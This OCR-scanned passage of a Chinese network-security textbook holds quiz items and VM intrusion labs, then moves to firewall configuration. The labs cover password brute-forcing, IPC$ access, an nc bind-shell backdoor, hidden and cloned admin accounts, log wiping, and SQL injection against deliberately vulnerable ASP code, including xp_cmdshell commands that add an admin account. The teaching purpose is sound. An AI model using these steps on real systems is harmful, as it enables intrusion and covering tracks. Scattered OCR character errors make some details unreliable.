D. 创建 一 个 新 账户 ,将 管理 员 账 户 克隆 到 该 账户 ,然后 将 该 账户 隐藏 
17. 以 下 关于 终端 服务 的 描述 ,不 正确 的 是 ( Js 
A. 终端 服务 使 用 的 端口 号 为 TCP 3389 ,该 端口 号 不 可 更 改 
B. 利用 终端 服务 ,可 获得 远程 目标 主机 的 桌面 图 形 环境 
C. 终端 服务 启动 后 ,还 必须 设置 启用 这 人 台 计 算 机 上 的 远程 桌面 ,才能 登录 连接 目 
标 主 机 的 远程 桌面 
D. 利用 注册 表 , 可 更 改 终端 服务 所 使 用 的 服务 端口 
18. 以 下 关于 日 志文 件 的 描述 ,不 正确 的 是 ( Jo 
A. 操作 系统 日 志文 件 的 保存 位 置 允 许 管理 员 更 改 
B. 攻击 者 可 通过 查询 目标 主机 的 注册 表 项 来 获得 操作 系统 日 志文 件 的 存放 位 置 
C. 可 使 用 elsave 工具 软件 远程 清除 目标 主机 的 操作 系统 日 志 
D. 可 使 用 CleanIISlog 工具 软件 远程 清除 目标 主机 的 IIS 日 志 


实 训 2.1 利用 1PC$ 连接 入 侵 主 机 


【 实 训 目的 】 掌握 密码 的 暴力 破解 方法 ,掌握 利用 IPC $ 远程 连接 入 侵 目 标 主机 的 步 
骤 和 操作 实现 方法 。 

【 实 训 环境 】 在 Windows 操作 系统 中 安装 VMware 虚拟 机 软件 ,然后 在 VMware Jë 
拟 机 软件 中 安装 Windows 2000 Server 操作 系统 。 在 Windows 操作 系统 中 ,对 虚拟 机 中 的 
Windows 2000 Server 系统 进行 人 侵 攻 击 实 训 。 

实 训 所 需 的 工具 软件 : brbook、SMBCrack .nc 和 elsave。 

【 实 训 内 容 与 步骤 】 

(1) 对 目标 操作 系统 的 管理 员 账 户 的 密码 ,进行 暴力 破解 。 

O 设置 虚拟 机 中 的 Windows 2000 Server 操作 系统 管理 员 账 户 的 密码 为 一 个 4 位 数 的 
字符 串 。 为 节约 实 训 时 的 破解 时 间 ,密码 尽量 简单 , 实 训 目 的 主要 是 掌握 该 破解 方法 。 

@ 使 用 brbook 工具 软件 生成 密码 字典 。 

© 使 用 SMBCrack 工具 软件 对 目标 操作 系统 的 Administrator 账户 的 密码 进行 暴力 
破解 。 

(2) 利用 暴力 破解 所 获得 的 管理 员 账 户 密码 ,与 目标 主机 建立 IPC$ 远程 连接 。 

(3) 利用 copy 命令 ,将 nc. exe 复制 到 目标 主机 的 ADMIN $ 共享 资源 所 在 的 文件 夹 。 

(4) 查询 目标 主机 的 当前 时 间 ,利用 at 命令 ,在 目标 主机 开启 计划 执行 任务 ,通过 定时 
执行 nc 命令 ,开启 远程 主机 的 Shell 后 门 ,将 远程 主机 的 Shell 绑 定 到 TCP 8080 端口 。 

(5) 利用 nc 登录 远程 目标 主机 .获得 远程 目标 主机 的 Shell 命令 行 。 
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(6) 在 目标 主机 的 远程 Shell 中 ,创建 一 个 名 为 admin$ 的 账户 ,并 设置 密码 为 letmein， 
并 将 该 账户 添加 到 管理 员 组 中 。 最 后 ,通过 net user 命令 ,查看 新 建 账户 的 属性 ,利用 net 
localgroup 命令 ,查看 管理 员 组 的 成 员 情 况 。 

(7) 使 用 elsave 工具 软件 ,清除 目标 主机 的 操作 系统 日 志 。 


实 训 2.2 创设 账户 后 门 


【 实 训 目的 】 掌握 账户 克隆 和 创设 隐藏 账户 的 操作 和 实现 方法 。 

【 实 训 环境 】 在 Windows 操作 系统 中 安装 VMware 虚拟 机 软件 ,然后 在 VMware 虚 
拟 机 软件 中 安装 Windows 2000/2003 Server 操作 系统 。 在 虚拟 机 中 的 Windows 2000/ 
2003 Server 操作 系统 中 ,进行 账户 克隆 和 隐藏 账户 操作 实 训 。 

实 训 所 需 的 工具 软件 : ca. exe 和 mt. exe, 

【 实 训 内 容 与 步骤 】 

(1) 使 用 图 形 化 界面 在 本 地 进行 账户 克隆 操作 。 

O 首先 设置 Guest 账户 的 密码 为 letmein, 然 后 按 教材 所 讲 的 操作 步骤 和 方法 ,使 用 
regedt32. exe 和 regedit. exe 注册 表 编 辑 器 ,以 注册 表 编 辑 器 的 图 形 界 面 , 将 administrator 
账户 克隆 到 Guest 账户 。 

@ 在 Windows 操 作 系 统 中 ,利用 克隆 获得 的 Guest 账户 ,对 虚拟 机 中 的 Windows 
2000/2003 Server 操作 系统 ,创建 IPC $ 远程 连接 。 

© 利用 copy 命令 ,向 目标 主机 复制 上 传 ne. exe 文件 到 ADMIN $ 共享 资源 所 在 的 文 
件 夹 ,检查 能 否 上 传 成 功 。 若 能 上 传 , 则 账户 克隆 成 功 。 

(2) 使 用 纯 命令 行 远程 克隆 目标 主机 的 管理 员 账 户 。 

O 利用 IPC $ 远程 连接 ,获得 目标 主机 的 远程 Shell, 

@ 按 教材 所 讲 的 详细 步骤 和 操作 方法 ,采用 纯 命 令 行 操作 ,将 目标 主机 的 管理 员 账 户 ， 
克隆 到 Internet 匿名 账户 。 然 后 重 置 Internet 匿名 账户 的 密码 为 letmein。 

© 断 开 原来 的 IPC$ 远 程 连接 ,利用 Internet 匿名 账户 创建 新 的 IPC$ 远 程 连接 。 然 
后 利用 copy 命令 ,向 目标 主机 复制 上 传 nc. exe 文件 到 ADMIN $ 共享 资源 所 在 的 文件 夹 ， 
检查 能 和 否 上 传 成 功 。 若 能 上 传 , 则 账户 克隆 成 功 。 

(3) 使 用 工具 软件 进行 账户 克隆 

D 首先 在 Windows 2000/2003 Server 操作 系统 上 创建 一 个 测试 用 的 testl 和 test2 
账户 。 

© 分 别 利用 ca. exe 和 mt. exe 工具 软件 ,利用 远程 操作 方式 ,将 目标 主机 的 管理 员 账 
户 ,分 别克 隆 到 testl 和 test2 账户 ,并 重 置 密码 为 letmein。 

(4) 创建 隐藏 的 克隆 账户 

O 利用 IPC $ 远程 连接 ,获得 目标 主机 的 远程 Shell。 

© 在 获得 的 远程 Shell 命令 行 ,创建 一 个 名 为 webadmin 的 账户 ,密码 设置 为 letmein。 

@ 利用 纯 命 令 行 操作 方式 ,将 管理 员 账 户 克隆 到 webadmin 账户 。 

@ 按 教材 所 讲 的 步骤 和 操作 方法 ,将 webadmin 账户 隐藏 。 
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© 断 开 原来 的 IPC $ 远程 连接 ,利用 webadmin 账户 重新 创建 新 的 IPC $ 远程 连接 。 
然后 利用 copy 命令 ,向 目标 主机 复制 上 传 nc. exe 文件 到 ADMIN $ 共享 资源 所 在 的 文件 
夹 ,检查 能 否 上 传 成 功 。 若 能 上 传 , 则 账户 克隆 成 功 。 


实 训 2.3 远程 开启 和 控制 目标 主机 的 终端 服务 


【 实 训 目的 】 掌握 远程 开启 和 控制 目标 主机 终端 服务 的 操作 步骤 和 实现 方法 。 

【 实 训 环境 】〗】 在 Windows 操作 系统 中 安装 VMware 虚拟 机 软件 ,然后 在 VMware 虚 
拟 机 软件 中 安装 Windows 2000/2003 Server 操作 系统 。 在 Windows 操作 系统 中 ,远程 开 
启 和 控制 虚拟 机 中 的 Windows 2000/2003 Server 操作 系统 的 终端 服务 。 

实 训 所 需 的 工具 软件 : ne. exe netsvc. exe 或 sc. exe, 

【 实 训 内 容 与 步骤 】 

(1) 查询 和 开启 目标 主机 的 终端 服务 。 

使 用 netsvc 或 sc 工具 软件 ,查询 目标 主机 的 终端 服务 的 运行 状态 , 若 没有 运行 , 则 启动 
运行 终端 服务 ,并 将 终端 服务 的 启动 模式 设置 为 自动 运行 。 

C) 采用 远程 Shell, 以 命令 行 操作 方式 ,启用 目标 主机 的 远程 桌面 。 

D 首先 用 终端 服务 的 客户 端 软件 , 试 着 登录 连接 目标 主机 的 终端 服务 。 若 无 法 成 功 登 
录 连 接 , 则 说 明 目 标 主机 的 远程 桌面 可 能 未 开启 。 

© 与 目标 主机 创建 IPC$ 远程 连接 ,并 获得 目标 主机 的 远程 Shell, 

© 在 所 获得 的 目标 主机 的 远程 Shell 命令 行 ,以 命令 行 操作 方式 ,利用 对 注册 表 指 定 键 
值 的 导出 和 导入 功能 ,通过 修改 注册 表 键 值 ,启用 目标 主机 的 远程 桌面 。 

@ 重新 使 用 终端 服务 的 客户 端 软件 ,登录 连接 目标 主机 的 终端 服务 。 

(3) 查看 目标 主机 终端 服务 的 端口 号 。 

在 所 获得 的 目标 主机 的 远程 Shell 命令 行 , 以 命令 行 操作 方式 ,通过 对 注册 表 指定 键 值 
的 导出 功能 ,查询 目标 主机 终端 服务 所 使 用 的 端口 号 。 


实 训 2.4 SQL 注入 攻击 


【 实 训 目的 】 掌握 SQL 注入 攻击 的 原理 以 及 常用 的 SQL 注入 方法 。 

【 实 训 环境 】 在 Windows 操作 系统 中 安装 VMware 虚拟 机 软件 ,然后 在 VMware 虚 
拟 机 软件 中 安装 Windows 2000/2003 Server 操作 系统 ,在 操作 系统 中 安装 Microsoft SQL 
Server 2000/2005 数据 库 服 务 器 ,并 配置 SQL 注入 攻击 测试 用 的 网 站 。 

【 实 训 内 容 与 步骤 】 

(1) 搭建 SQL 注入 攻击 测试 环境 。 

D 创建 测试 网 站 的 后 台数 据 库 webdata, 并 在 数据 库 中 创建 userinfo 数据 表 , 数 据 表 字 
段 为 id( 自 动 递增 )、username 和 pwd 字段 ,然后 在 数据 表 中 添加 一 条 记录 ,username 和 
pwd 字段 的 值 分 别 为 admin 和 Lockmel314。 最 后 再 创建 连接 访问 该 后 台数 据 库 的 数据 库 
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账户 websa, 密码 设置 为 Isu24361KL, 并 设置 该 账户 对 webdata 数据 库 具 有 owner 和 
public 权限 。 

@ 编写 测试 网 站 的 后 台 登 录 页 面 login. htm 和 登录 校 验 页 面 checklogin. asp。 登 录 校 
验 成 功 后 , 跳 转 到 后 台 管理 系统 的 主页 面 manage. asp, 这 3 个 页 面 的 代码 如 下 所 示 。 

a. 使 用 记事 本 在 网 站 根 目录 下 创建 login. htm 文件 ,其 内 容 如 下 : 

< form name = frmlogin method = post action = checklogin.asp> 

用 户 名 :< input type = text name = txtusername size = 20 ><br> 


密码 :< input type = password name = txtpwd ><br > 
< input type = submit value = 登录 > 


</form > 
b. 使 用 记事 本 在 网 站 根 目录 下 创建 checklogin. asp 文件 ,文件 内 容 如 下 : 
<% 


varusername = request. form( "txtusername") 
varpwd = request. form( "txtpwd") 
sqlstr = "select * from userinfo where username = '" & varusername & "' and pwd = '" & varpwd & "'" 
Response. write sqlstr & "<br>" 
connstr = "Provider = SOLOLEDB; Server = 127. 0. 0. 1; Database = webdata; uid = websa; password = 
Isu24361KL" 
set conn = Server. CreateObject ("ADODB. Connection") 
conn. open connstr 
set rs = Server. CreateObject ( "ADODB. Recordset" ) 
rs. open sqlstr,conn,1,1 
if rs. recordcount >= 1 then 
Session( "userflag") = 1 
Response. Redirect "manage. asp" 
else 
Session("userflag") = 0 
end if 
rs. close 
set rs = nothing 
set conn = nothing 
*%> 


c 使 用 记事 本 在 网 站 根 目录 下 创建 manage. asp 文件 ,文件 内 容 如 下 : 


<% 

if Session("userflag") = 0 then Response. redirect "login. htm" 
Response. write "网 站 后 台 主 控 界面 " 

4> 


@ 配置 网 站 文件 和 文件 夹 的 访问 权限 :保证 网 站 能 正常 运行 。 
(2) 单 引号 注入 攻击 。 按 教材 所 讲 方法 ,进行 单 引号 注入 攻击 测试 ,查看 能 否 顺利 进入 


后 台 管理 系统 的 主 界面 。 
(3) 通过 使 用 分 号 ,来 构造 多 句 查询 ,并 结合 使 用 " -- "注释 符 , 注 释 掉 多 余 的 语句 , 实 
现 SQL 语句 的 注入 和 执行 。 


(D Hi insert into 注入 语句 ,实现 在 后 台数 据 库 的 userinfo 用 户 数据 表 中 ,添加 一 个 名 
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为 webadmin 的 账户 ,账户 密码 设置 为 letmein。 

© 构造 update 注入 语句 ,将 后 台 系 统 的 admin 账户 的 密码 更 改 为 sniper。 

(4) 通过 构造 子 查询 方式 ,实现 SQL 的 注入 和 执行 。 

构造 注入 的 “select * from sysobjects” 子 查询 ,判断 数据 库 是 否 是 SQL Server 类 型 的 
数据 库 。 

(5) 通过 SQL 注入 ,人 为 制造 SQL 语句 的 语法 错误 ,通过 错误 信息 的 输出 ,获得 注入 
的 SQL 语句 的 查询 数据 。 

利用 该 方法 ,分 别 获 得 userinfo 数据 表 中 id 值 为 1 的 记录 的 username 和 pwd 字段 
的 值 。 

(6) 构造 SQL 注入 语句 “exec master. dbo. xp _cmdshell”, 利用 exec 调用 执行 
xp_cmdshell 存储 过 程 ,实现 在 目标 主机 的 C:\Autoexec. bat 文件 中 添加 以 下 语句 : 

@echo of f 

net user admin$ letmein /add 

net localgroup administrators admin$ /add 

注入 操作 执行 完毕 后 ,用 记事 本 打开 C:\Autoexec. bat 文件 ,检查 文件 中 是 否 有 该 
内 容 。 
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第 3 章 通信 子 网 安全 防范 


计算 机 网 络 由 通信 子 网 和 资源 子 网 两 部 分 构成 ,本 章 介绍 实现 网 络 通信 功能 的 通信 子 
网 的 安全 防范 措施 和 方法 。 


3.1 通信 子 网 常用 的 安全 措施 


1. 通信 子 网 简介 

计算 机 网 络 主要 实现 网 络 通 信和 资源 共享 。 通常 ,也 可 将 计算 机 网 络 视 为 由 通信 子 网 
和 资源 子 网 两 部 分 构成 。 计 算 机 网 络 中 实现 网 络 通信 功能 的 设备 及 其 软件 的 集合 称 为 通信 
子 网 ,而 将 网 络 中 实现 资源 共享 功能 的 设备 及 其 软件 的 集合 称 为 资源 子 网 。 

通信 子 网 实现 的 是 网 络 层 及 以 下 各 层 的 功能 。 对 于 局 域 网 ,通信 子 网 的 实现 设备 包含 
网 卡 、 网 络 传 输 介质 交换机 和 路 由 器 等 。 对 于 广域网 ,通信 子 网 的 实现 设备 主要 是 路 由 器 。 
资源 子 网 由 连 网 的 服务 器 .工作 站 共享 的 打印 机 和 其 他 设备 及 相关 软件 组 成 。 

2. 常用 的 安全 措施 

在 整个 计算 机 网 络 的 安全 中 ,保障 通信 子 网 的 安全 和 稳定 运行 是 首要 的 任务 。 

目前 ,解决 和 保障 通信 子 网 的 安全 , 主要 采用 防火 墙 技术 和 入 侵 检测 与 防御 技术 来 实 
现 。 防 火 墙 技术 属于 被 动 式 防御 ,入 侵 检测 与 防御 技术 属于 主动 式 安全 防御 ,这 由 入 侵 防御 
系统 (Intrusion Prevention System,IPS) 来 实现 。 

在 局 域 网 中 ,目前 主要 使 用 基于 IP 报 文 过 滤 式 的 防火 墙 。 

为 保证 整个 通信 子 网 的 安全 ,在 局 域 网 与 因特网 互联 的 边界 ,可 布置 防火 墙 设备 ,以 实 
现 保护 局 域 网 不 遭受 到 来 自 因特网 的 攻击 。 另 一 方面 ,可 在 三 层 交 换 机 上 配置 ACL 
(Access Control List) 规 则 ,实现 对 特定 IP 报 文 的 过 滤 , 以 阻止 局 域 网 内 病毒 或 攻击 报 文 的 
传播 ,从 而 保证 整个 通信 子 网 的 安全 。 


32 防 X H 


3.2.1 防火 墙 简介 


防火 墙 属于 被 动 式 安全 防御 设备 ,通过 对 特定 IP 报 文 的 过 滤 ,来 阻 断 这 些 报 文 的 传输 ， 
从 而 切断 病毒 或 网 络 攻击 报 文 的 传播 途径 ,达到 保护 网 络 的 目的 。 人 允许 通行 或 禁止 通行 的 
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报 文 ,通过 配置 防火 墙 的 过 滤 规 则 来 实现 。 

防火 墙 对 IP 报 文 的 过 滤 检 查 ,主要 从 报 文 的 源 IP 地 址 、 源 端口 .目的 IP 地 址 和 目的 端 
口 以 及 协议 类 型 这 几 方 面 来 进行 。 

防火 墙 一 般 位 于 网 络 边界 ,以 保护 本 地 网 络 不 遭受 与 之 相连 的 外 部 网 络 的 攻击 。 

防火 墙 除了 具有 IP 报 文 过 滤 功 能 之 外 ,一 般 也 具有 NAT 和 路 由 功能 ,因此 ,在 网 络 边 
界 布置 防火 墙 ,除了 可 保护 本 地 局 域 网 之 外 ,也 可 利用 防火 墙 的 NAT 功能 ,来 实现 局 域 网 
用 户 访问 因特网 。 

对 于 中 低 端 防火 墙 ,其 端口 功能 是 相对 固定 的 ,常见 的 端口 有 WAN, LAN, DMZ 和 
IDS, WAN 口 用 于 连接 因特网 ,LAN 用 于 连接 局 域 网 内 网 ,DMZ 用 于 连接 DMZ 区 的 服务 
器 群 ,IDS 用 于 连接 入 侵 检 测 系统 。IPS 是 IDS 的 新 一 代 , 除 具有 入 侵 检测 功能 之 外 ,还 具 
有 入 侵 防 御 功 能 。 

对 于 高 端的 防火 墙 ,其 网 络 接口 功能 是 不 固定 的 ,可 根据 应 用 的 需要 进行 灵活 配置 。 防 
火 墙 的 每 一 个 网 络 接口 相当 于 一 个 路 由 器 接口 ,它们 都 属于 三 层 设备 。 


3.2.2 防火 墙 的 分 类 


基于 IP 报 文 过 滤 式 的 防火 墙 ,总 体 上 可 分 为 基于 硬件 的 防火 墙 、 半 硬 半 软 防火 墙 和 纯 
软件 式 防火 墙 三 大 类 。 

基于 硬件 的 防火 墙 是 指 采 用 自主 开发 的 操作 系统 ,加 上 专用 的 ASIC 芯片 所 构建 的 纯 
硬件 式 防 火 墙 。 数 据 报 文 到 达 ASIC 芯片 后 ,数据 报 文 按照 ASIC 芯片 固化 的 功能 直接 进 
行 处 理 , 而 不 是 通过 操作 系统 和 防火 墙 软件 来 处 理 , 操 作 系 统 仅 用 作 管 理 和 配置 。 

基于 硬件 的 防火 墙根 据 处 理性 能 还 可 分 为 高 、 中 、 低 端 防火 墙 三 类 。 防 火 墙 的 主流 厂商 
主要 有 Cisco, 华 为 . 华 三 和 锐 捷 等 。 

半 硬 半 软 防火 墙 是 指 采用 免费 的 操作 系统 (Linux) 或 自主 开发 的 操作 系统 ,加 上 免费 
的 或 自主 开发 的 防火 墙 软件 ,最 后 再 加 上 PC 结构 的 工控 机 所 构建 起 来 的 防火 墙 。 这 类 防 
火 墙 对 报 文 的 处 理 是 通过 操作 系统 和 防火 墙 软件 共同 实现 的 。 对 报 文 的 处 理 速度 和 性 能 远 
不 如 纯 硬 件 防火 墙 。 

纯 软 件 式 防 火 墙 常用 于 客户 端 操作 系统 ,以 对 用 户主 机 提供 安全 保护 。 基 于 软件 的 防 
火 墙 常见 的 有 瑞星 防火 墙 , 天 网 防火 墙 等 。Windows XP 系统 内 徊 的 防火 墙 也 属于 软件 式 
防火 墙 。 


3.2.3 ”防火墙 的 配置 途径 与 配置 策略 


1. 防火 墙 的 配置 途径 
防火 墙 的 配置 一 般 有 基于 命令 行 的 配置 方式 和 基于 Web 页 面 的 配置 方式 两 种 。 基 于 
命令 行 的 配置 方式 需要 管理 人 员 熟 悉 相 关 的 配置 指令 ,难度 相对 较 高 ,这 种 配置 方式 使 用 较 
少 。 目前 防火 墙 普 遍 采 用 基于 Web 页 面 的 配置 方式 。 
出 于 安全 考虑 ,防火 墙 的 Web 配置 页 面 一 般 采 用 https:// 协 议 进 行 加 密 传 输 ,服务 端 
口 有 的 采用 TCP 80 端口 ,有 的 采用 非 TCP 80 端口 。 
2. 防火 墙 的 配置 策略 
对 防火 墙 规 则 的 配置 策略 有 默认 允许 和 默认 禁止 两 种 。 默 认 允 许 策略 就 是 配置 指定 禁 
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止 通过 防火 墙 , 需 要 将 该 类 报 文 丢弃 的 报 文 匹 配 规则 ,对 于 列 出 的 所 有 报 文 匹配 规则 , 均 不 
匹配 的 报 文 , 则 一 律 允 许 通 行 。 默 认 禁 止 策 略 就 是 配置 指定 允许 通行 的 报 文 匹 配 规则 ,没有 
指明 允许 通行 的 报 文 , 则 一 律 禁止 通行 。 


3.2.4 安装 配置 基于 硬件 的 防火 博 


本 节 以 锐 捷 的 RG-WALL 1600T 防火 墙 为 例 ,介绍 其 安装 与 配置 方法 。 

1. RG-WALL 1600T 防火 墙 简介 

RG-WALL 1600T 是 面向 大 中 型 园区 网 络 的 出 口 而 开发 的 新 一 代 电 信和 级 高 性 能 防火 
墙 ,采用 了 最 新 的 硬件 平台 和 体系 架构 ,实现 了 防火 墙 性 能 的 跨越 式 突破 ,可 支持 数 十 个 
GE 接口 。RG-WALL 1600T 在 内 核 层 处 理 所 有 数据 报 文 的 接收 、 分 类 、 转 发 工作 ,不 会 成 
为 网 络 流量 的 瓶颈 。 

RG-WALL 1600T 具备 的 主要 功能 如 下 。 

(1) 支持 深度 状态 检测 、 外 部 攻击 防范 .内 网 安全 、 流 量 监控 ,邮件 过 滤 、 网 页 过 滤 .应 用 
层 过 滤 等 功能 ,能 够 有 效 地 保证 网 络 的 安全 。 

(2) 具有 入 侵 监测 功能 ,可 判断 攻击 并 且 提 供 解决 措施 , 且 入 侵 监 测 功 能 不 会 影响 防火 
省 的 性 能 。 

(3) 支持 PPTP、L2TP、IPSec 和 SSL 等 多 种 VPN 业务 ,可 以 构建 多 种 形式 的 VPN, 

(4) 提供 强大 的 路 由 功能 ,支持 静态 /RIP/OSPF/ 路 由 策略 及 策略 路 由 。 

(5) 提供 多 种 智能 分 析 和 管理 手段 ,支持 邮件 告警 ,支持 多 种 日 志 , 提 供 网 络 管理 监控 ， 
协助 网 络 管理 员 完 成 网 络 的 安全 管理 。 

(6) 支持 双 机 状态 热 备 ,支持 Active/ Active 和 Active/Standby 两 种 工作 模式 以 及 丰富 
的 QoS 特性 ,充分 满足 客户 对 网 络 高 可 靠 性 的 要 求 。 

(7) 通过 增 配 RG-WALL UTM 功能 模块 ,还 可 使 防火 墙 集 防 病毒 .内容 过 滤 、 反 垃圾 
邮件 ,IPS, 绿 色 上 网 等 多 项 安全 技术 于 一 身 .从 而 形成 一 个 统一 的 安全 威胁 防御 管理 系统 。 

2. 防火 墙 的 外 观 

锐 捷 RG-WALL 1600T 防火 墙 的 外 观 如 图 3. 1 所 示 。 


图 3.1 锐 捷 RG-WALL 1600T 防火 墙 


RG-WALL 1600T 防火 墙 具 有 4 个 网 络 接口 扩展 插 权 ,可 根据 需要 选 配 相应 的 网 络 接 
口 。 另 外 ,还 提供 了 2 个 管理 用 的 100Mbps 以 太 网 接口 和 1 个 Console 配置 口 。 

3. 防火 墙 的 安装 连接 

防火 墙 的 物理 安装 连接 比较 简单 。 插 好 电源 .然后 用 双 绞 线 或 光纤 跳 线 ,将 防火 墙 与 其 
他 网 络 设 备 互 连 起 来 , 即 完成 了 防火 墙 的 物理 安装 连接 。 但 要 实现 网 路 的 互联 互通 ,还 需 对 
防火 墙 进行 合理 配置 。 
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在 进行 物理 连 线 之 前 ,可 对 防火 墙 的 各 端口 用 途 做 事先 规划 ,然后 按照 规划 方案 ,进行 
物理 连 线 ,最 后 再 按 规划 方案 对 各 端口 进行 相应 配置 。 

4. 防火 墙 的 配置 方式 与 步骤 

(1) 防火 墙 的 配置 方式 

防火 墙 的 配置 一 般 通 过 防火 墙 提供 的 Web 配置 页 面 来 实现 。RG-WALL 1600T 防火 
墙 为 提高 配置 页 面 的 安全 性 ,采用 “https:// 协 议和 数字 证 书 技术 ”来 实现 对 Web 配置 页 面 
的 安全 保护 ,并 保证 防火 墙 自身 的 安全 。 

RG-WALL 1600T 防火 墙 的 Web 配置 界面 如 图 3. 2 所 示 , 以 下 界面 是 防火 墙 配 置 好 后 
的 系统 运行 状态 监控 界面 (首页 ) 。 


Wutz 67 vps) 发 送 13 63 yo) 
3.62.0 (- 5.2.12 08 ) Wars 130npy) 发 送 138 09 Mbps) 
ea 换 iro98 02 039) 发 送 39.52 np 
BLL 1600r ARLES. 150mps) 发 送 472 z1 0ps) 


图 3.2 RG-WALL 1600T 防火 墙 的 Web 配置 界面 


(2) 防火 墙 的 基本 配置 步 又 

防火 墙 提 供 了 基于 Web 的 配置 页 面 , 配 置 操 作 本 身 比较 简单 ,其 配置 的 关键 在 于 根据 
应 用 业务 的 需要 ,规划 设计 出 配置 方案 ,然后 再 根据 该 配置 方案 进行 配置 。 

RG-WALL 1600T 防火 墙 是 一 款 高 性 能 千 兆 防火 墙 。 在 本 示例 中 ,该 防火 墙 部 署 在 网 
络 的 边界 ,担任 NAT 转换 、 包 过 滤 IP 映射 和 端口 映射 等 功能 。 对 防火 墙 的 配置 ,大 体 可 从 
以 下 三 方面 进行 。 

(D 根据 网 络 规划 ,配置 各 互联 接口 的 了 P 地址 。 

O 配置 安全 规则 ,实现 NAT 转换 . 包 过 滤 IP 映射 .端口 映射 等 功能 。 

@ 配置 策略 路 由 。 该 防火 墙 支持 根据 要 访问 的 目的 网 络 地 址 配置 路 由 ,也 可 根据 源 地 
址 配置 路 由 ( 源 路 由 ) 。 

5. 防火 墙 的 配置 操作 

(1) 配置 防火 墙 网 络 接口 的 IP 地 址 

在 如 图 3. 2 所 示 的 主 界面 中 ,在 左 侧 菜单 栏 中 单 击 * 网 络 配置 "项 左边 的 "十 ”图 标 ,展开 
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网 络 配置 的 下 级 菜单 。 在 下 级 菜单 中 选择 “接口 IP? 选 项 ,切换 到 对 防火 墙 网 络 接口 的 IP 
地 址 配置 页 面 。 在 该 页 面 中 , 单 击 “ 添 加 ”按钮 ,此 时 将 打开 如 图 3. 3 所 示 的 “添加 、 编 辑 接口 
IP” 窗 口 ,在 该 配置 页 面 中 ,可 选择 要 配置 IP 地 址 的 接口 ,并 实现 对 IP 地 址 的 配置 或 编辑 
修改 。 


允许 所 有 主机 PTN6 

用 于 管理 

允许 管理 主机 PING 

允许 管理 主机 Traceroute 


图 3.3 添加 或 编辑 接口 的 IP 地 址 


在 如 图 3.3 所 示 的 界面 中 ,在 “网 络 接口 ?下 拉 列 表 中 可 选择 要 配置 IP 地 址 的 接口 , 然 
后 在 “接口 IP? 输 入 框 中 输入 该 接口 的 IP 地址, 在“ 掩 码 "输入 框 中 输入 子 网 掩 码 , 也 可 单 击 
带 向 下 箭头 的 按钮 ,在 下 拉 列 表 中 选择 子 网 掩 码 。 勾 选 “ 允 许 所 有 主机 PING”, “FE 
理 ”“ 人 允许 管理 主机 PING” 和 “允许 管理 主机 Traceroute” 复 选 框 ,最 后 单 击 “ 确 定 ” 按 钮 , 即 
可 完成 对 该 网 络 接口 IP 地 址 的 配置 。 

在 “接口 IP” 的 管理 页 面 ,将 以 列表 的 形式 显示 出 当前 已 配置 IP 地 址 的 网 络 接口 的 配 
党 信息 ,并 在 最 后 一 列 提供 了 编辑 和 删除 操作 选项 ( Z, (J ), 单 击 加 图 标 ,可 实现 对 该 接口 
配置 信息 的 编辑 修改 ; 单 击 窗 图 标 ,可 删除 当前 接口 的 配置 信息 。 

对 网 络 接口 的 工作 模式 (路 由 模式 或 混合 模式 ) .MTU 值 . 网 口 速率 的 设置 ,通过 “网 络 
配置 "菜单 项 下 面 的 “网 络 接口 " 子 菜单 项 来 管理 ,如 图 3. 4 所 示 。 单 击 接口 列表 最 后 一 列 的 
图 图 标 , 即 可 对 该 接口 这 些 方面 的 配置 进行 编辑 修改 。 

(2) 配置 安全 规则 

O 安全 规则 简介 。NAT 地 址 转换 、 包 过 滤 、IP 映射 和 端口 映射 功能 , 均 通 过 添加 配置 
安全 规则 来 实现 。 

在 左 侧 的 菜单 栏 中 , 单 击 “ 安 全 策略 ” 主 菜 单项 左边 的 “十 "图标 ,展开 其 子 菜单 ,然后 选 
择 “ 安 全 规则 ” 子 菜单 项 ,此 时 就 会 打开 如 图 3. 5 所 示 的 “安全 规则 维护 ”界面 。 

安全 规则 的 类 型 分 为 包 过 滤 、.NAT.\IP 映射 ,端口 映射 和 代理 ,可 通过 “类 型 "下 拉 框 进 
行 选择 。 不 同类 型 的 安全 规则 ,其 配置 项 内 容 不 同 。 图 3. 5 为 包 过 滤 类 型 的 配置 界面 ,IP 
映射 类 型 安全 规则 的 配置 界面 如 图 3. 6 所 示 ,NAT 类 型 安全 规则 如 图 3. 7 所 示 。 

© 配置 IP 映射 。IP 映射 就 是 将 一 个 公 网 IP 地 址 ,与 内 网 中 的 一 个 私 网 IP 地 址 建立 
起 一 对 一 的 映射 关系 ,使 因特网 用 户 通过 该 公 网 IP 地 址 ,能 访问 到 位 于 局 域 网 中 并 使 用 私 
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图 3.5 添加 包 过 滤 安 全 规则 


网 地 址 的 服务 器 。 

在 添加 配置 IP 映射 安全 规则 之 前 ,应 先 将 用 于 IP 映射 的 公 网 IP 地 址 ,在 接口 IP 组 中 
进行 定义 ,将 该 公 网 IP 地 址 定义 一 个 别名 。 在 后 面 添加 IP 映射 安全 规则 时 ,通过 该 别名 来 
引用 该 公 网 IP Hb nk, 

在 主 界面 左 侧 的 菜单 栏 中 ,依次 选择 “对 象 定义 ”一 “地 址 ”一 “接口 IP 组 "菜单 项 ,打开 
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图 3.7 添加 NAT 安全 规则 


接口 IP 组 管理 页 面 。 在 该 管理 页 面 中 . 单 击 “ 添 加 ”按钮 ,此 时 将 打开 如 图 3.8 所 示 的 配置 
窗口 。 

在 如 图 3. 8 所 示 的 配置 页 面 中 ,在 “名 称 ” 输 入 框 中 可 输入 定义 接口 IP 组 的 名 称 ,比如 
定义 为 “IP 映射 地 址 201”, 管 理 员 可 根据 自己 的 命名 规则 进行 统一 命名 。 在 “手动 输入 " 输 
入 框 中 输入 用 于 IP 映射 的 公 网 IP 地 址 ,然后 单 击 输入 框 右 侧 的 “二 二 ”按钮 ,将 该 公 网 地 址 
添加 到 IP 组 成 员 列 表 中 。 在 “备注 ”输入 框 中 可 输入 该 接口 IP 组 的 用 途 说 明 , 比 如 输入 * 财 
经 系 教务 管理 服务 器 ”, 最 后 单 击 “ 确 定 ” 按 钮 ,完成 对 接口 IP 组 的 定义 。 
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s: 字母 、 汉 字 Spot) AF RS TANA 
) 


接口 IP 和 NAMT 地 址 池 列 表 IHARA 
10. 0. 2. 1 


192. 168. 252. 1 
anana 


图 3.8 定义 接口 耻 组 


添加 安全 规则 ,在 “类 型 "下 拉 列 表 框 中 选择 “IP 映射 "选项 ,如 图 3. 6 所 示 。 在 “ 源 地 
址 ?输入 框 中 输入 或 选择 any 选项 ,在 “公开 地 址 "下拉 列表 框 中 选择 前 面 定义 的 “IP 映射 地 
